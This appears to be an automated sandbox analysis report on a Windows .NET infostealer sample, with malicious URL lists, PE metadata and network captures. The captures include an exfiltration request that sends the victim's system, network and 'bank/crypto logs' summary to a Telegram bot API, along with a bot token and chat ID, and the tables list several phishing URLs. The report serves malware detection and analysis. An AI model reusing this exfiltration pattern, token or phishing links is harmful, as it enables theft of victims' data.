CLOUDFLARENETUS	cargo detail.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	https://www.mundodomarketing.com.br/	Get hash	malicious	HTMLPhisher	Browse	162.159.135.45
	http://bandamazonas.com.br/	Get hash	malicious	Unknown	Browse	104.16.160.145
	https://www.mundodomarketing.com.br/	Get hash	malicious	HTMLPhisher	Browse	162.159.135.45
	https://pybu8.vk.com////away.php?to=https://brandequity.economictimes.indiatimes.com/etl.php?url=1844forezcash.com/bin/kpm/sf_rand_string_lowercase(6)/sf_base64_encode/YmxhQGJsYS5jb20=	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	rules for group chats 5021.js	Get hash	malicious	Unknown	Browse	172.67.159.188
	Piping Bulk Material Details.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	http://moremashup.com	Get hash	malicious	Unknown	Browse	141.101.120.11
	https://us-west-2.protection.sophos.com/?d=purposeadvisor.com&u=aHR0cHM6Ly9vZmMuYWMucHVycG9zZWFkdmlzb3IuY29tL2Fkdmlzb3JfcG9ydGFsL2NsaWVudHMvNDAwOTc0&i=NjBiYTdmNjgxNDkwYmIwZjRmOWUwNGI0&t=MDZQNXpyd0Q1SytybjUvWUlrMTQzSmg5eGphYkYyamxuSkxLSytMcUdwST0=&h=1ffbd61cf8d24048ab3fc8ad7e6cc09c&s=AVNPUEhUT0NFTkNSWVBUSVa642Sa30j9O4WM93voaDiZGQxyrW9gQ-DDcZ_Npfi-Dw	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://track.enterprisetechsol.com/z.z?l=aHR0cHM6Ly9yZXNvdXJjZS5pdGJ1c2luZXNzdG9kYXkuY29tL3doaXRlcGFwZXJzLzQ3OTA5LU1pY3Jvc29mdC1DUEwtUTMtUE1HLUF6dXJlLVVLLTItbGFuZGluZy5waHA%2fZT1jaGVvbG1pbi55YW5nQGh5dW5kYWllbGV2YXRvci5jb20%3d&r=14650708707&d=12037165&p=2&t=h&h=b31ef758ea4a5eaf1cd28fb80e2a38d7	Get hash	malicious	Unknown	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://ddd.tiktok7.org/	Get hash	malicious	Unknown	Browse	104.20.3.235 104.21.44.66 149.154.167.220
	https://exchange.add-solution.de/owa/owa_ocbcadejsm_form?l293yq==/owa_ocbcadejsm_form?l293ys9vd2ffb2niy2fkzwpzbv9mb3jtp0wyotnzut09/owa_ocbcadejsm_form?l293ys9vd2ffb2niy2fkzwpzbv9mb3jtp0wyotnzut09l293yv9vy2jjywrlanntx2zvcm0/tdi5m1ltoxzkmkzmyjjoavkyrmtav3b6yly5bwizsnrqmhd5t1rowlvumdk=	Get hash	malicious	Unknown	Browse	104.20.3.235 104.21.44.66 149.154.167.220
	https://dear-house-request-01.surge.sh/	Get hash	malicious	Unknown	Browse	104.20.3.235 104.21.44.66 149.154.167.220
	https://hwy.pages.dev/%5C%5C%5C%22https:%5C/%5C/tapestry.tapad.com%5C/tapestry%5C/1?ta_partner_id=950&ta_redirect=https	Get hash	malicious	HTMLPhisher	Browse	104.20.3.235 104.21.44.66 149.154.167.220
	https://yhz.pages.dev/%5C%5C%5C%22https:%5C/%5C/t.myvisualiq.net%5C/impression_pixel?r=739915162&et=i&ago=212&ao=546&aca=26620495&si=4449639&ci=-7&pi=316681543&ad=-7&advt=4470647&chnl=-7&vndr=115&sz=6696&u=%5Bcustom_data%5D&pt=i%5C%5C%5C%22	Get hash	malicious	HTMLPhisher	Browse	104.20.3.235 104.21.44.66 149.154.167.220
	http://porodix.cyberspector.network/	Get hash	malicious	Unknown	Browse	104.20.3.235 104.21.44.66 149.154.167.220
	http://ourtime.people-meedia.workers.dev/v3/aboutonlinedating	Get hash	malicious	HTMLPhisher	Browse	104.20.3.235 104.21.44.66 149.154.167.220
	https://profiles.secure-dashboard-ours.workers.dev/v3/help	Get hash	malicious	HTMLPhisher	Browse	104.20.3.235 104.21.44.66 149.154.167.220
	https://publishpostnow.github.io/statemntaboutgeneryal/casee-problem/homes/?/r7ykizdrvuzkmrqm+orbnvfbl6doitfpri4tjfhxawutupf	Get hash	malicious	HTMLPhisher	Browse	104.20.3.235 104.21.44.66 149.154.167.220
	https://worker-restless-dawn-a10d.caryl7.workers.dev/common/reprocess?ctx=rqqiaraahzk_j9t0amxj5c73q4vgbywoaekgkfcfk69_fe2c1ogsolet_0gu38rxluji2lgdr2mncew7s0hmqatsxcbwixpchjgqe2k8qqnt-qvoakjqudyczbxl03t60lve5_ialznlqgwef-gyopuq5shhstyuzgglkmx1ckibssfjzarmrqj5af2uhxyxikeg9-rks9q3hvprve7td26juzeoo81zpzkmatl0hm-yy1yyvpdlcuyt5wn9a0e8j4ib_l69jaf92_wgmgilbw43ywiqpjmok2t-c6gheab6vvjlmt	Get hash	malicious	HTMLPhisher	Browse	104.20.3.235 104.21.44.66 149.154.167.220

Process:	C:\Users\user\Desktop\viVOqZjAT0.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	6
Entropy (8bit):	2.2516291673878226
Encrypted:	false
SSDEEP:	3:McSh:McSh
MD5:	AB0660A9F96B11D82CD0A5679740F134
SHA1:	6963A72283B889AE928E9D5A61735B38474CC003
SHA-256:	4E8EC6454AB799F686DAAB65B341EC5975E36381EA589F4CDB0A692F6C20DDD4
SHA-512:	1A5B5F0D7C48FCD00C190733B726F2EA164B0DFEEE3D8E4C8A4B627C4B89B173C7C3313C9A698E891591C35D41F2FDB02AB303C878D968CA7CD1F432D65F78FE
Malicious:	false
Reputation:	low
Preview:	109795

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.896984699121707
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	viVOqZjAT0.exe
File size:	179'200 bytes
MD5:	19f436930646f3e8f283fa71f2a4cbcb
SHA1:	99397666d23ddde6078496ee73bde00ae9403393
SHA256:	40e64ea2d9253f93606f6f62966f05e2bb300e03e82ecd54c5dcba5640df0dff
SHA512:	addba9ff5bd334ddfec06f87d2c69c06028b82d0aab732f73ef35e84f46d889f48ab6823371a9b9f415e2758e62270866682b833bca7406354802e0157314e0d
SSDEEP:	3072:+e8p6ewdOIwQx76vK/bvTv0cU+lL/dMlZZUZ0b2gTDwARE+WpCc:W6ewwIwQJ6vKX0c5MlYZ0b2E
TLSH:	7F045B5837D80A15F3BE5FB8F4B012118B71B477AA1AE75F18E920EE0D62351E911FA3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................... ............`................................

Entrypoint:	0x42d1be
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A7E09C [Mon Jul 29 18:34:04 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2d16c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2e000	0x600	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x30000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x2b1c4	0x2b200	934d5c4df02aede14294597db7f5502d	False	0.46038836050724635	data	5.924442193872815	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x2e000	0x600	0x600	ccd2ec796af2f339686e45e5513c2caf	False	0.4140625	data	4.029504312109572	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x30000	0xc	0x200	8e19c1ec6db51c8435749ecf42a022c8	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x2e0a0	0x30c	data			0.4269230769230769
RT_MANIFEST	0x2e3ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 31, 2024 07:07:12.098402023 CEST	49730	80	192.168.2.4	104.16.185.241
Jul 31, 2024 07:07:12.103436947 CEST	80	49730	104.16.185.241	192.168.2.4
Jul 31, 2024 07:07:12.103521109 CEST	49730	80	192.168.2.4	104.16.185.241
Jul 31, 2024 07:07:12.104162931 CEST	49730	80	192.168.2.4	104.16.185.241
Jul 31, 2024 07:07:12.109013081 CEST	80	49730	104.16.185.241	192.168.2.4
Jul 31, 2024 07:07:12.806792974 CEST	80	49730	104.16.185.241	192.168.2.4
Jul 31, 2024 07:07:12.807862043 CEST	80	49730	104.16.185.241	192.168.2.4
Jul 31, 2024 07:07:12.807934046 CEST	49730	80	192.168.2.4	104.16.185.241
Jul 31, 2024 07:07:12.879749060 CEST	49731	443	192.168.2.4	104.21.44.66
Jul 31, 2024 07:07:12.879774094 CEST	443	49731	104.21.44.66	192.168.2.4
Jul 31, 2024 07:07:12.879884005 CEST	49731	443	192.168.2.4	104.21.44.66
Jul 31, 2024 07:07:12.890034914 CEST	49731	443	192.168.2.4	104.21.44.66
Jul 31, 2024 07:07:12.890067101 CEST	443	49731	104.21.44.66	192.168.2.4
Jul 31, 2024 07:07:13.387677908 CEST	443	49731	104.21.44.66	192.168.2.4
Jul 31, 2024 07:07:13.387757063 CEST	49731	443	192.168.2.4	104.21.44.66
Jul 31, 2024 07:07:13.391773939 CEST	49731	443	192.168.2.4	104.21.44.66
Jul 31, 2024 07:07:13.391791105 CEST	443	49731	104.21.44.66	192.168.2.4
Jul 31, 2024 07:07:13.392193079 CEST	443	49731	104.21.44.66	192.168.2.4
Jul 31, 2024 07:07:13.430865049 CEST	49731	443	192.168.2.4	104.21.44.66
Jul 31, 2024 07:07:13.476494074 CEST	443	49731	104.21.44.66	192.168.2.4
Jul 31, 2024 07:07:14.000611067 CEST	443	49731	104.21.44.66	192.168.2.4
Jul 31, 2024 07:07:14.000688076 CEST	443	49731	104.21.44.66	192.168.2.4
Jul 31, 2024 07:07:14.000947952 CEST	49731	443	192.168.2.4	104.21.44.66
Jul 31, 2024 07:07:14.017129898 CEST	49731	443	192.168.2.4	104.21.44.66
Jul 31, 2024 07:07:14.019680023 CEST	49730	80	192.168.2.4	104.16.185.241
Jul 31, 2024 07:07:14.027661085 CEST	80	49730	104.16.185.241	192.168.2.4
Jul 31, 2024 07:07:14.027801991 CEST	49730	80	192.168.2.4	104.16.185.241
Jul 31, 2024 07:07:14.034804106 CEST	49732	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:14.034898043 CEST	443	49732	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:14.035026073 CEST	49732	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:14.035321951 CEST	49732	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:14.035371065 CEST	443	49732	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:14.683511972 CEST	443	49732	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:14.683590889 CEST	49732	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:14.686283112 CEST	49732	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:14.686301947 CEST	443	49732	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:14.686645985 CEST	443	49732	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:14.687787056 CEST	49732	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:14.687830925 CEST	443	49732	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:14.930754900 CEST	443	49732	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:14.930799961 CEST	443	49732	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:14.930851936 CEST	49732	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:14.930876970 CEST	443	49732	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:14.930937052 CEST	443	49732	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:14.930995941 CEST	49732	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:14.931552887 CEST	49732	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:14.937910080 CEST	49733	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:14.937933922 CEST	443	49733	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:14.938011885 CEST	49733	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:14.938221931 CEST	49733	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:14.938241005 CEST	443	49733	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:15.561162949 CEST	443	49733	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:15.562761068 CEST	49733	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:15.562774897 CEST	443	49733	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:15.838089943 CEST	443	49733	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:15.838213921 CEST	443	49733	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:15.838263988 CEST	49733	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:15.838589907 CEST	49733	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:15.929517031 CEST	49734	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:15.929533005 CEST	443	49734	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:15.929652929 CEST	49734	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:15.930639029 CEST	49734	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:15.930650949 CEST	443	49734	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:16.597477913 CEST	443	49734	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:16.604402065 CEST	49734	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:16.604422092 CEST	443	49734	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:16.906585932 CEST	443	49734	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:16.909193039 CEST	49734	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:16.909209967 CEST	443	49734	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:16.910490990 CEST	49734	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:16.910495996 CEST	443	49734	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:16.910564899 CEST	49734	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:16.910578012 CEST	443	49734	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:16.910887957 CEST	49734	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:16.910907030 CEST	443	49734	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:16.911102057 CEST	49734	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:16.911236048 CEST	443	49734	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:16.911329031 CEST	49734	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:16.911344051 CEST	443	49734	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:16.911360979 CEST	49734	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:16.911370993 CEST	443	49734	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:16.911950111 CEST	49734	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:16.911962032 CEST	443	49734	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:16.911978960 CEST	49734	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:16.911984921 CEST	443	49734	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:16.912098885 CEST	49734	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:16.912220001 CEST	443	49734	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:17.462259054 CEST	443	49734	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:17.462331057 CEST	443	49734	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:17.462397099 CEST	49734	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:17.462999105 CEST	49734	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:17.471458912 CEST	49735	443	192.168.2.4	104.20.3.235
Jul 31, 2024 07:07:17.471492052 CEST	443	49735	104.20.3.235	192.168.2.4
Jul 31, 2024 07:07:17.471659899 CEST	49735	443	192.168.2.4	104.20.3.235
Jul 31, 2024 07:07:17.472016096 CEST	49735	443	192.168.2.4	104.20.3.235
Jul 31, 2024 07:07:17.472026110 CEST	443	49735	104.20.3.235	192.168.2.4
Jul 31, 2024 07:07:17.971569061 CEST	443	49735	104.20.3.235	192.168.2.4
Jul 31, 2024 07:07:17.971637964 CEST	49735	443	192.168.2.4	104.20.3.235
Jul 31, 2024 07:07:17.973690033 CEST	49735	443	192.168.2.4	104.20.3.235
Jul 31, 2024 07:07:17.973696947 CEST	443	49735	104.20.3.235	192.168.2.4
Jul 31, 2024 07:07:17.973967075 CEST	443	49735	104.20.3.235	192.168.2.4
Jul 31, 2024 07:07:17.975203991 CEST	49735	443	192.168.2.4	104.20.3.235
Jul 31, 2024 07:07:18.016532898 CEST	443	49735	104.20.3.235	192.168.2.4
Jul 31, 2024 07:07:18.500158072 CEST	443	49735	104.20.3.235	192.168.2.4
Jul 31, 2024 07:07:18.500369072 CEST	443	49735	104.20.3.235	192.168.2.4
Jul 31, 2024 07:07:18.500412941 CEST	49735	443	192.168.2.4	104.20.3.235
Jul 31, 2024 07:07:18.500994921 CEST	49735	443	192.168.2.4	104.20.3.235
Jul 31, 2024 07:07:18.502664089 CEST	49738	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:18.502686977 CEST	443	49738	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:18.502757072 CEST	49738	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:18.503288984 CEST	49738	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:18.503302097 CEST	443	49738	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:19.117830038 CEST	443	49738	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:19.119539022 CEST	49738	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:19.119554996 CEST	443	49738	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:19.422986031 CEST	443	49738	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:19.423383951 CEST	49738	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:19.423412085 CEST	443	49738	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:19.423577070 CEST	49738	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:19.423583031 CEST	443	49738	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:19.423691988 CEST	49738	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:19.423712015 CEST	443	49738	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:19.423839092 CEST	49738	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:19.423862934 CEST	443	49738	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:19.424169064 CEST	49738	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:19.424194098 CEST	443	49738	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:19.424310923 CEST	49738	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:19.424333096 CEST	443	49738	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:19.424340963 CEST	49738	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:19.424350023 CEST	443	49738	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:19.424420118 CEST	49738	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:19.424437046 CEST	49738	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:19.424452066 CEST	443	49738	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:19.424474955 CEST	443	49738	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:19.424511909 CEST	49738	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:19.424546957 CEST	443	49738	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:19.876116037 CEST	443	49738	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:19.876214027 CEST	443	49738	149.154.167.220	192.168.2.4
Jul 31, 2024 07:07:19.876271009 CEST	49738	443	192.168.2.4	149.154.167.220
Jul 31, 2024 07:07:19.878571987 CEST	49738	443	192.168.2.4	149.154.167.220

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 31, 2024 07:07:11.091614008 CEST	62174	53	192.168.2.4	1.1.1.1
Jul 31, 2024 07:07:12.043070078 CEST	53	62174	1.1.1.1	192.168.2.4
Jul 31, 2024 07:07:12.087616920 CEST	53667	53	192.168.2.4	1.1.1.1
Jul 31, 2024 07:07:12.094558954 CEST	53	53667	1.1.1.1	192.168.2.4
Jul 31, 2024 07:07:12.860579014 CEST	60344	53	192.168.2.4	1.1.1.1
Jul 31, 2024 07:07:12.879178047 CEST	53	60344	1.1.1.1	192.168.2.4
Jul 31, 2024 07:07:14.019676924 CEST	60617	53	192.168.2.4	1.1.1.1
Jul 31, 2024 07:07:14.034284115 CEST	53	60617	1.1.1.1	192.168.2.4
Jul 31, 2024 07:07:17.464026928 CEST	50753	53	192.168.2.4	1.1.1.1
Jul 31, 2024 07:07:17.470622063 CEST	53	50753	1.1.1.1	192.168.2.4

Timestamp	Bytes transferred	Direction	Data
Jul 31, 2024 07:07:12.104162931 CEST	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Jul 31, 2024 07:07:12.806792974 CEST	534	IN	HTTP/1.1 200 OK Date: Wed, 31 Jul 2024 05:07:12 GMT Content-Type: text/plain Content-Length: 12 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=CCa4RVE5dY95opMQWhoNl23Lx5uOydogInzFZ8gLiSE-1722402432-1.0.1.1-euclOF5ypacTOC.BrqmsvEO943gW_plo5.Reg8RVgeuW5PwcXeEc1w74FMxZ9T_RBOu8XD4YAwwE1Ayw5QWgGw; path=/; expires=Wed, 31-Jul-24 05:37:12 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8abb10434ef18c27-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a Data Ascii: 8.46.123.33
Jul 31, 2024 07:07:12.807862043 CEST	534	IN	HTTP/1.1 200 OK Date: Wed, 31 Jul 2024 05:07:12 GMT Content-Type: text/plain Content-Length: 12 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=CCa4RVE5dY95opMQWhoNl23Lx5uOydogInzFZ8gLiSE-1722402432-1.0.1.1-euclOF5ypacTOC.BrqmsvEO943gW_plo5.Reg8RVgeuW5PwcXeEc1w74FMxZ9T_RBOu8XD4YAwwE1Ayw5QWgGw; path=/; expires=Wed, 31-Jul-24 05:37:12 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8abb10434ef18c27-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a Data Ascii: 8.46.123.33

Timestamp	Bytes transferred	Direction	Data
2024-07-31 05:07:13 UTC	112	OUT	GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1 Host: api.mylnikov.org Connection: Keep-Alive
2024-07-31 05:07:13 UTC	783	IN	HTTP/1.1 200 OK Date: Wed, 31 Jul 2024 05:07:13 GMT Content-Type: application/json; charset=utf8 Content-Length: 88 Connection: close Access-Control-Allow-Origin: * Cache-Control: max-age=2678400 CF-Cache-Status: MISS Last-Modified: Wed, 31 Jul 2024 05:07:13 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=86UpdAOHVE%2ByFdVCctbf4KqZ0%2BupmSQbjAjxgWiOEL1HWEfDWjLDwTcBDO8Myvv753WZsXtGqX2spZ18gsCy66IEVa35OcX3X2%2BNapUHJ41T7a5Wg8G0cFQas%2FLjC9E%2FJnXb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 8abb10494bad4240-EWR alt-svc: h3=":443"; ma=86400
2024-07-31 05:07:13 UTC	88	IN	Data Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 32 32 34 30 32 34 33 33 7d Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1722402433}

Timestamp	Bytes transferred	Direction	Data
2024-07-31 05:07:14 UTC	1722	OUT	GET /bot6082381502:AAFgFkge53k6kBZcTN8CBICiZV-VphQ1WgA/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-07-31%201:07:02%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20899552%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20CT_BZ8R%0ARAM:%204095MB%0AHWID:%2049CC9AD8BB%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20 [TRUNCATED] Host: api.telegram.org Connection: Keep-Alive
2024-07-31 05:07:14 UTC	389	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 31 Jul 2024 05:07:14 GMT Content-Type: application/json Content-Length: 1880 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
